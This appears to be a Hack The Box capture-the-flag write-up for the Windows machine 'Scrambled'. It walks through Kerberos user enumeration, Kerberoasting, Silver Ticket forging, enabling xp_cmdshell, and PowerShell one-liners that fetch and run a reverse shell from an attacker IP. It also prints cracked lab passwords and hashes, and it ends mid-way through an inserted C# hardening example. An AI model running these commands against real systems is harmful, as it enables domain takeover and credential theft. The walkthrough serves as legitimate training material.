
Hack The Box - Scrambled

Scrambled presents information on its website that let us identify credentials, which helped us forge a 'Silver Ticket' and then gain access through MSSQL. With credentials found in a database and PowerShell we gained access as a second user. Finally we escalated privileges after discovering and analysing a desktop application in which we exploited a .NET 'Deserialization' vulnerability with the help of Ysoserial.NET.

Name: Scrambled
OS: Windows
Points: 30
Difficulty: Medium
IP: 10.10.11.168
Maker: VbScrub


Recon

nmap

nmap shows multiple open ports: dns (53), http (80), kerberos (88), rpc (135), ldap (139), mssql (1433), (4411) and winrm (5985).

# Nmap 7.92 scan initiated Thu Jul  7 13:51:25 2022 as: nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,4411,5985,9389,49673,49674,49698,59041 -sV -sC -oN nmap_scan 10.10.11.168
Nmap scan report for 10.10.11.168 (10.10.11.168)
Host is up (0.26s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-07 17:51:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
|_ssl-date: 2022-07-07T17:54:43+00:00; -1s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
|_ssl-date: 2022-07-07T17:54:43+00:00; -1s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2022-07-07T17:54:43+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-07-07T13:39:00
|_Not valid after:  2052-07-07T13:39:00
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-07-07T17:54:43+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
|_ssl-date: 2022-07-07T17:54:43+00:00; -1s from scanner time.
4411/tcp  open  found?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
59041/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
|   date: 2022-07-07T17:54:05
|_  start_date: N/A
| ms-sql-info:
|   10.10.11.168:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul  7 13:54:47 2022 -- 1 IP address (1 host up) scanned in 201.75 seconds

Kerbrute

While analysing the information on the website we ran kerbrute to enumerate users and observed seven valid users.

 π ~/htb/scrambled ❯ /opt/kerbrute userenum -t 100 -d scrm.local --dc 10.10.11.168 xato-net-10-million-usernames-dup.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 07/15/22 - Ronnie Flathers @ropnop

2022/07/15 19:49:01 >  Using KDC(s):
2022/07/15 19:49:01 >   10.10.11.168:88

2022/07/15 19:49:06 >  [+] VALID USERNAME:    administrator@scrm.local
2022/07/15 19:49:18 >  [+] VALID USERNAME:    asmith@scrm.local
2022/07/15 19:49:34 >  [+] VALID USERNAME:    Administrator@scrm.local
2022/07/15 19:49:45 >  [+] VALID USERNAME:    jhall@scrm.local
2022/07/15 19:51:36 >  [+] VALID USERNAME:    sjenkins@scrm.local
2022/07/15 19:51:53 >  [+] VALID USERNAME:    khicks@scrm.local
2022/07/15 19:53:36 >  [+] VALID USERNAME:    Asmith@scrm.local
2022/07/15 19:56:59 >  [+] VALID USERNAME:    ASMITH@scrm.local
2022/07/15 19:57:46 >  [+] VALID USERNAME:    tstar@scrm.local
2022/07/15 20:12:51 >  Done! Tested 624370 usernames (9 valid) in 1429.221 seconds
 π ~/htb/scrambled ❯

Web Site

The site's headers show Microsoft IIS 10.0.

 π ~/htb/scrambled ❯ curl -sI 10.10.11.168
HTTP/1.1 200 OK
Content-Length: 2313
Content-Type: text/html
Last-Modified: Thu, 04 Nov 2021 18:13:14 GMT
Accept-Ranges: bytes
ETag: "3aed29a2a7d1d71:0"
Server: Microsoft-IIS/10.0
Date: Fri, 15 Jul 2022 23:32:34 GMT

 π ~/htb/scrambled ❯

The website is presented as part of an intranet.


IT Services shows several pages; the notable one carries an alert stating that NTLM authentication is disabled.


Contact IT Support shows contact information, revealing two possible usernames: support and ksimpson.


New User Account shows a "registration" form, but it is not submitted to any route.


Sales Orders App Troubleshooting shows a desktop application; we note the server address and port, the latter being present in the nmap output.


Password Resets shows password-change information; it states that after a password reset the username can be used as the password.


Running kerbrute again, this time with the two users, only ksimpson is reported as valid.

 π ~/htb/scrambled ❯ /opt/kerbrute userenum -t 100 -d scrm.local --dc 10.10.11.168 users.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 07/15/22 - Ronnie Flathers @ropnop

2022/07/15 20:19:33 >  Using KDC(s):
2022/07/15 20:19:33 >   10.10.11.168:88

2022/07/15 20:19:33 >  [+] VALID USERNAME:    ksimpson@scrm.local
2022/07/15 20:19:33 >  Done! Tested 2 usernames (1 valid) in 0.068 seconds
 π ~/htb/scrambled ❯

User - SQLsvc

Kerberos Authentication

As the site indicated, the username can be used as the password; in this case we see that the ksimpson user logs in successfully against Kerberos.

 π ~/htb/scrambled ❯ /opt/kerbrute bruteuser --dc 10.10.11.168 -d scrm.local users.txt ksimpson

[.. snip ..]

2022/07/15 20:19:46 >  [+] VALID LOGIN:    ksimpson@scrm.local:ksimpson
2022/07/15 20:19:46 >  Done! Tested 3 logins (1 successes) in 0.399 seconds
 π ~/htb/scrambled ❯

WADComs is a site that lists commands for enumeration or exploitation in Windows environments according to the information we have. One of them is impacket's GetUserSPNs. However, after running the script we observe an error.

 π ~/htb/scrambled ❯ impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168 -request -debug
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Connecting to 10.10.11.168, port 389, SSL False
Traceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/GetUserSPNs.py", line 510, in <module>
    executer.run()
  File "/usr/share/doc/python3-impacket/examples/GetUserSPNs.py", line 271, in run
    ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
  File "/usr/lib/python3/dist-packages/impacket/ldap/ldap.py", line 336, in login
    type3, exportedSessionKey = getNTLMSSPType3(negotiate, bytes(type2), user, password, domain, lmhash, nthash)
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 621, in getNTLMSSPType3
    ntlmChallenge = NTLMAuthChallenge(type2)
  File "/usr/lib/python3/dist-packages/impacket/structure.py", line 87, in __init__
    self.fromString(data)
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 379, in fromString
    Structure.fromString(self,data)
  File "/usr/lib/python3/dist-packages/impacket/structure.py", line 152, in fromString
    self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0])
  File "/usr/lib/python3/dist-packages/impacket/structure.py", line 315, in unpack
    raise Exception("Unpacked data doesn't match constant value '%r' should be '%r'" % (data, answer))
Exception: ("Unpacked data doesn't match constant value 'b''' should be ''NTLMSSP\\x00''", 'When unpacking field \' | "NTLMSSP\x00 | b\'\'[:8]\'')
[-] ("Unpacked data doesn't match constant value 'b''' should be ''NTLMSSP\\x00''", 'When unpacking field \' | "NTLMSSP\x00 | b\'\'[:8]\'')
 π ~/htb/scrambled ❯

The error leads us to the impacket repository, where it is discussed that NTLM authentication is disabled (the alert on the site mentions it) and Kerberos authentication must be used instead. A solution is mentioned, along with a pull request that applies it to three impacket scripts (GetADUsers.py, GetNPUsers.py, GetUserSPNs.py, see commit); it is worth noting that the solution is presented by the machine's author.

Ticket - Kerberos

To authenticate via Kerberos we need a ticket, so we request one for the ksimpson user using impacket's getTGT.

 π ~/htb/scrambled ❯ impacket-getTGT scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in ksimpson.ccache
 π ~/htb/scrambled ❯ file ksimpson.ccache
ksimpson.ccache: data
 π ~/htb/scrambled ❯ export KRB5CCNAME=`pwd`/ksimpson.ccache
 π ~/htb/scrambled ❯ echo $KRB5CCNAME
/home/kali/htb/scrambled/ksimpson.ccache
 π ~/htb/scrambled ❯

We clone the impacket repository containing the fix, in this case the 'add-dc-host-option' branch.

 π ~/htb/scrambled ❯ git clone -b add-dc-host-option https://github.com/rmaksimov/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 21256, done.
remote: Total 21256 (delta 0), reused 0 (delta 0), pack-reused 21256
Receiving objects: 100% (21256/21256), 7.35 MiB | 1.12 MiB/s, done.
Resolving deltas: 100% (16226/16226), done.
 π ~/htb/scrambled ❯

We run GetUserSPNs with Kerberos authentication and obtain the hash for the sqlsvc user.

 π ~/htb/scrambled ❯ impacket/examples/GetUserSPNs.py scrm.local/ksimpson -k -no-pass -request -dc-ip 10.10.11.168 -dc-host dc1.scrm.local
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2022-07-15 00:56:52.273402
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 12:32:02.351452  2022-07-15 00:56:52.273402



$krb5tgs$23$*sqlsvc$SCRM.LOCAL$MSSQLSvc/dc1.scrm.local*$67b545c8a8b581039ec835bba9d27e5b$3b302f3739382078a3c1cf29c27b7e8a9a2a349860479344247f31be9783b9dea6f2560c1c0992f720c44dc69e7fdf0d5ed6ea6d8a38a5ac0f32d372ff168c3f00c504ccaf0224c45dc4d74481255ed9655502d820adf323a3a2b46172b68b75a0a88b7f572db286c7faa26b87176f446862eabf88d6bbe3e6ca6382c4277f1d212e7d72253964e3b9bfb14486c3015a6b5caf760cf964343c855a39ab88647cccedf71bd78718c13b6cb46a39dd6b4af69503a77b7830cd2c3bb8b7c878d802617211dc0ed5a03aed141b2a37acc31b951a446a23f2df45cf452fcb5794ca71fec3a3d3a96470ec1d1943b3ba8ebb7fffdf5abeec762c458d0f81f868e4d8d141009ab58520c28b328865ca2600984fc34590190ce08573372749e0746ce1e6b9bf015721d8570dd95718e8befbce3657fdce675371b2b6c8bd577bcb68389e43c7d317fe1194a7a8129ef20175dbf995106d5ee32db3c101adaa270b37d7b57e5b5a25be04ba4b5232f05612bedbfc48866ddcb5209d670adfc582b39bfcb707eff1a8712d907486fe858922428e433b2f62de29507c2b18c0b40a405662a1fa688bf635fae0d48302d4c8e67c45da5d9cd51ea52e4ff63e400b70e702c7aaec5a1878d498c7cbf29d404b1c648f0a4233594d1fe9c1b7270048668078e4762feccd4c24d1b41f1e281beac895c52f001ac2f98abd7da70349c77a8612d860484f9a9e9690efb359ba7ce22974651fe666d81191a6a12ca876bc7ab248a07dd8c21ea4d46f22c2649fdaad1ef1a8378937e27e824df468f97bd3f6a97cacc7354d62d4256f31234622dc6202a9a180cb7c15d480f30a622742159b833e4969d8c335f691f0087d62118200985dc0e48462a8a2656a9dbd66e4fcfc0048e5e8bd8a534dee2049204e992205b21dd7e2d92a4ece7a8c8d7713aeb0d20d4ba8821ff2a2f1dca02c70ad6d7541b03e3157b21f3cbd2606eae1d49c064b5aef928b7f561f44017162b846131abe6e47037bd2e0f438264de3a8fa2813c3c5eba5770f5bb4f31b04cd931077d07f80d7ab6b7694897aabd247bd09e7ca844ffa594d8d3def655917b311908ac40e879c876b23717c033a0613fee0d30ab354ada1e199d1912f8da9005d3c823df808664bc4a274aac0e6d1a193aabb43fc7be817bfcd61cdd929246d71e16f4b46b2fc69862c70bf0c31c51e2a4cf4f5563c3cc5e1e8ddcc7b72b6a4c4a7ef5dcedcd0cf35c41799bd70b596de5eef28b0cc5b0e1854871971fd2af1ede3ae034611c002f9bf567ebf063d3d95a87c245878aff287acde26b5a66ab28e0a53803314bc81b55032570a31b957f2867370c
c79cac365e467b08bb3c7ef197e57600728b343b5a4e4158d15bd0be1e676b50f715ddc6d0e3baccee0dc8a2ffc0468737cb791084452a6763a9d66f9239ab6
 π ~/htb/scrambled ❯

Password Hash Cracking

After running john with the rockyou wordlist we obtained the password.

 π ~/htb/scrambled ❯ john --wordlist=$ROCK sqlsvc_hash
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Pegasus60        (?)
1g 0:00:00:05 DONE (2022-07-15 20:28) 0.1773g/s 1902Kp/s 1902Kc/s 1902KC/s Penrose..Pearce
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/scrambled ❯

We try to authenticate to mssql via Kerberos by requesting a ticket, but mssql does not let us in.

  π ~/htb/scrambled ❯ impacket-getTGT scrm.local/sqlsvc:Pegasus60 -dc-ip 10.10.11.168
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in sqlsvc.ccache
 π ~/htb/scrambled ❯ export KRB5CCNAME=`pwd`/sqlsvc.ccache
 π ~/htb/scrambled ❯ impacket/examples/mssqlclient.py dc1.scrm.local/sqlsvc@10.10.11.168 -k -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
 π ~/htb/scrambled ❯

Silver Ticket

After some more research we came across Silver Tickets: with the information we have we can forge a ticket for a service. To do so we need a user's NTLM hash and SID.

To obtain the SID, impacket's lookupsid could help us, but lookupsid does not support Kerberos authentication.

 π ~/htb/scrambled ❯ impacket-lookupsid scrm.lcoal/ksimpson:ksimpson@dc1.scrm.local
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Brute forcing SIDs at dc1.scrm.local
[*] StringBinding ncacn_np:dc1.scrm.local[\pipe\lsarpc]
[-] SMB SessionError: STATUS_NOT_SUPPORTED(The request is not supported.)
 π ~/htb/scrambled ❯

VbScrub, in the video on Silver Tickets, presents GetDomainSID.exe, a tool for obtaining the SIDs of a domain by specifying credentials; the same information can also be obtained through Kerberos authentication. The LDAP query used by this program is shown below.

(&(ObjectClass=user)(objectSid=*)(!(ObjectClass=foreignSecurityPrincipal)))

Using the query above we modified impacket's GetADUsers script to obtain the SIDs of the users in the domain.

 π ~/htb/scrambled ❯ ./sidkerberos.py scrm.local/ksimpson -k -no-pass -dc-ip 10.10.11.168 -dc-host dc1.scrm.local -all
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Querying dc1.scrm.local for information about domain.
Name                  SID
--------------------  ------------------------------
administrator         S-1-5-21-2743207045-1827831105-2542523200-500
Guest                 S-1-5-21-2743207045-1827831105-2542523200-501
                      S-1-5-21-2743207045-1827831105-2542523200-1000
krbtgt                S-1-5-21-2743207045-1827831105-2542523200-502
tstar                 S-1-5-21-2743207045-1827831105-2542523200-1106
asmith                S-1-5-21-2743207045-1827831105-2542523200-1107
sjenkins              S-1-5-21-2743207045-1827831105-2542523200-1118
sdonington            S-1-5-21-2743207045-1827831105-2542523200-1119
                      S-1-5-21-2743207045-1827831105-2542523200-1120
backupsvc             S-1-5-21-2743207045-1827831105-2542523200-1601
jhall                 S-1-5-21-2743207045-1827831105-2542523200-1603
rsmith                S-1-5-21-2743207045-1827831105-2542523200-1604
ehooker               S-1-5-21-2743207045-1827831105-2542523200-1605
khicks                S-1-5-21-2743207045-1827831105-2542523200-1611
sqlsvc                S-1-5-21-2743207045-1827831105-2542523200-1613
miscsvc               S-1-5-21-2743207045-1827831105-2542523200-1617
ksimpson              S-1-5-21-2743207045-1827831105-2542523200-1619
 π ~/htb/scrambled ❯
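LDAP returns objectSid as a binary structure, so a script like the modified GetADUsers has to decode it before it can print the S-1-... values in the table above, and ticketer's -domain-sid option later needs the domain part without the trailing RID. The following is an added example (not code from the writeup or from impacket) that does both; the sample bytes are constructed from the well-known BUILTIN\Administrators SID.

```python
"""Decode the binary objectSid attribute returned by LDAP into S-1-... text.
Added example, not part of the writeup or of impacket."""
import struct


def sid_to_string(raw: bytes) -> str:
    """Parse the SID structure: revision, sub-authority count, 48-bit identifier
    authority (big-endian), then 32-bit little-endian sub-authorities."""
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, sub_count = raw[0], raw[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if len(raw) != 8 + 4 * sub_count:
        raise ValueError("sub-authority count does not match data length")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack(f"<{sub_count}I", raw[8:])
    return "S-%d-%d%s" % (revision, authority, "".join(f"-{s}" for s in subs))


def string_to_sid(sid: str) -> bytes:
    """Inverse of sid_to_string; used here to build test data."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("not a SID string")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def split_domain_sid(sid: str) -> tuple:
    """Split an account SID into (domain SID, RID). The domain SID is what
    ticketer's -domain-sid option takes; the RID identifies the account."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def domain_sid_from_accounts(sids) -> str:
    """Derive the single domain SID from a list of account SIDs (as in the table
    above) and refuse to guess if the accounts do not all share one domain."""
    domains = {split_domain_sid(s)[0] for s in sids}
    if len(domains) != 1:
        raise ValueError(f"accounts span several domains: {sorted(domains)}")
    return domains.pop()


# Constructed sample: the well-known BUILTIN\Administrators SID S-1-5-32-544 in binary.
BUILTIN_ADMINS_RAW = bytes.fromhex("0102" "000000000005" "20000000" "20020000")

if __name__ == "__main__":
    print(sid_to_string(BUILTIN_ADMINS_RAW))  # S-1-5-32-544
```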

We need the user's NTLM hash; in this case we have sqlsvc's cleartext password, and with python we can generate the NTLM hash.

 π ~/htb/scrambled ❯ python -c 'import hashlib,binascii; print(binascii.hexlify(hashlib.new("md4", "Pegasus60".encode("utf-16le")).digest()))'
b'b999a16500b87d17ec7f2e2a68778f05'
 π ~/htb/scrambled ❯

With that we have the information needed to generate our ticket, which we do with impacket's ticketer. We observe that the ticket was saved in sqlsvc.ccache.

 π ~/htb/scrambled ❯ impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip 10.10.11.168 -spn cifs/dc1.scrm.local sqlsvc
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/sqlsvc
[*]   PAC_LOGON_INFO
[*]   PAC_CLIENT_INFO_TYPE
[*]   EncTicketPart
[*]   EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]   PAC_SERVER_CHECKSUM
[*]   PAC_PRIVSVR_CHECKSUM
[*]   EncTicketPart
[*]   EncTGSRepPart
[*] Saving ticket in sqlsvc.ccache
 π ~/htb/scrambled ❯

MSSQL

We export the full path of the ticket in the KRB5CCNAME variable and run impacket's mssqlclient with Kerberos authentication, gaining access.

 π ~/htb/scrambled ❯ impacket-mssqlclient scrm.local/sqlsvc@dc1.scrm.local -no-pass -k
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> select USER;


--------------------------------------------------------------------------------------------------------------------------------

dbo

SQL>

Enumerating the databases we see ScrambleHR, and in its UserImport table we find the LDAP credentials for the miscsvc user.

SQL> select name from sys.databases;
name

--------------------------------------------------------------------------------------------------------------------------------

master

tempdb

model

msdb

ScrambleHR

SQL> use ScrambleHR;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
[*] INFO(DC1): Line 1: Changed database context to 'ScrambleHR'.
SQL> SELECT table_name FROM information_schema.tables;
table_name

--------------------------------------------------------------------------------------------------------------------------------

Employees

UserImport

Timesheets

SQL> select * from UserImport;
LdapUser                                             LdapPwd                                              LdapDomain                                           RefreshInterval   IncludeGroups

--------------------------------------------------   --------------------------------------------------   --------------------------------------------------   ---------------   -------------

MiscSvc                                              ScrambledEggs9900                                    scrm.local                                                        90               0

SQL>

Shell

As in Querier - HTB, we enable xp_cmdshell for command execution.

SQL> EXEC sp_configure 'show advanced options', 1; EXEC sp_configure reconfigure; EXEC sp_configure 'xp_cmdshell', 1;EXEC sp_configure reconfigure;
[*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
name                                      minimum       maximum   config_value     run_value

-----------------------------------   -----------   -----------   ------------   -----------

allow polybase export                           0             1              0             0

[.. snip ..]

user options                                    0         32767              0             0

xp_cmdshell                                     0             1              1             0

SQL>

We see that we have access as sqlsvc.

SQL> EXEC master.dbo.xp_cmdshell 'whoami';
output                                                                                                                                                                                  

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

scrm\sqlsvc                                                                                                                                                                             

NULL                                                                                                                                                                                    

SQL>

We run a Nishang PowerShell shell.

EXEC master.dbo.xp_cmdshell "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.207/shell.ps1')"; 

After that we obtain a shell as sqlsvc.

 π ~/htb/scrambled ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.207] from scramblecorp.com [10.10.11.168] 57575
Windows PowerShell running as user sqlsvc on DC1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
scrm\sqlsvc
PS C:\Windows\system32>

User - Miscsvc

In the root of the drive we find the Shares folder; we only have access to Public/, where we find a PDF with information about a recent attack and the disabling of NTLM authentication.

PS C:\Shares> dir


    Directory: C:\Shares


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       01/11/2021     15:21                HR
d-----       03/11/2021     19:32                IT
d-----       01/11/2021     15:21                Production
d-----       04/11/2021     22:23                Public
d-----       03/11/2021     19:33                Sales


PS C:\Shares>


Shell

Similar to Arkham - HTB, we use the credentials found in the database to run commands as miscsvc. We observe that we have access as miscsvc.

PS C:\users> $SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force;
PS C:\users> $Cred = New-Object System.Management.Automation.PSCredential('MiscSvc', $SecPassword);
PS C:\users> $session = New-PSSession -ComputerName DC1.SCRM.LOCAL -Credential $Cred;
PS C:\users> Invoke-Command -Session $session -ScriptBlock { whoami }
scrm\miscsvc
PS C:\users>
PS C:\users>

We run a Nishang shell.

Invoke-Command -Session $session -ScriptBlock { powershell.exe -c "iex(new-object net.webclient).downloadstring('http://10.10.14.207/shell2.ps1')" }

This gets us our user.txt flag.

 π ~/htb/scrambled ❯ rlwrap nc -lvp 1336
listening on [any] 1336 ...
connect to [10.10.14.207] from scramblecorp.com [10.10.11.168] 57607
Windows PowerShell running as user miscsvc on DC1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\miscsvc\Documents> whoami
scrm\miscsvc
PS C:\Users\miscsvc\Documents> cd ../Desktop
PS C:\Users\miscsvc\Desktop> dir


    Directory: C:\Users\miscsvc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       15/07/2022     05:56             34 user.txt


PS C:\Users\miscsvc\Desktop> cat user.txt
53310aeb2461d48034d2169608926e2c
PS C:\Users\miscsvc\Desktop>

Privesc

We discover a desktop application in one of the C:\Shares folders; it is surely the one discussed on the website.

PS C:\Shares\IT\Apps\Sales Order Client> dir


    Directory: C:\Shares\IT\Apps\Sales Order Client


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       05/11/2021     20:52          86528 ScrambleClient.exe
-a----       05/11/2021     20:52          19456 ScrambleLib.dll


PS C:\Shares\IT\Apps\Sales Order Client>

After retrieving both files we see that they appear to be written in .NET.

 π ~/htb/scrambled/app ❯ file ScrambleClient.exe
ScrambleClient.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
 π ~/htb/scrambled/app ❯ file ScrambleLib.dll
ScrambleLib.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
 π ~/htb/scrambled/app ❯

ScrambleClient

We install ILSpy on a Windows machine to recover the source code and analyse it.

Opening ScrambleClient.exe we look at its components; they show no interaction with the server or any service, only buttons, labels, inputs, etc., and the executable uses the ScrambleLib library.

ScrambleLib

We look at the classes the library exposes; one of them is Log.

It shows that this class writes to the file ScrambleDebugLog.txt.

In SalesOrder we find functions that serialize and deserialize with BinaryFormatter, encoded in base64, which would amount to a deserialization vulnerability.

In ScrambleNetClient we find that the login can be bypassed by using the user ‘scrmdev’.

It also contains some functions for sending and/or receiving data.

ScrambledNetRequest and ScrambledNetResponse handle the different requests. Finally, ScrambleNetShared holds constants.

Scramble - App

We set the server address to the machine's IP address.

Logging in as user ‘scrmdev’ we get in and see a list of orders.

We can also submit a new order.

We run Wireshark to look at the requests the application makes: when a new order is submitted it opens a connection to the server on port 4411 and sends the serialized data, most likely base64-encoded, as seen in the code.

Decoding it reveals information about the SalesOrder class/object.

If we connect to the machine on port 4411 we get an error after sending bad input, and we see that it expects a base64-encoded serialized string.

 π ~/htb/scrambled ❯ nc 10.10.11.168 4411
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;abc
ERROR_GENERAL;Error deserializing sales order: Invalid length for a Base-64 char array or string.
QUIT
 π ~/htb/scrambled ❯
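The two weaknesses identified above, the base64 + BinaryFormatter round-trip in SalesOrder and the `UPLOAD_ORDER;<base64>` framing on port 4411, are shown below first as the vulnerable pattern and then in two hardened forms. This is an added example, not code from ScrambleLib or from this writeup: the SalesOrder fields, the `SUCCESS;` reply string, the size cap and the runtime (one where BinaryFormatter is still available, e.g. .NET Framework 4.8 with the System.Text.Json package) are all assumptions.

```csharp
using System;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text.Json;

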